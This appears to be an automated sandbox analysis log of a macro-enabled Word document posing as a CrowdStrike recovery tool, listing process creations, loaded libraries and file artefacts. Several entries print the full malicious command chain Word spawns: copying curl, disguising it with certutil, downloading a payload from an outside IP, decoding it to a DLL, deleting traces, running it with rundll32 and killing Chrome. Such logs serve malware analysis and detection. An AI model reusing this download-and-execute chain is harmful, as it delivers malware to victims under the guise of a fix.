Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: Templates.LNK.0.dr LNK file: ..\..\Templates
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Initial sample: OLE zip file path = docProps/custom.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.dr Initial sample: OLE zip file path = docProps/custom.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.dr Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.26.dr Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0000.tmp.26.dr Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0000.tmp.26.dr Initial sample: OLE zip file path = word/media/image3.jpg
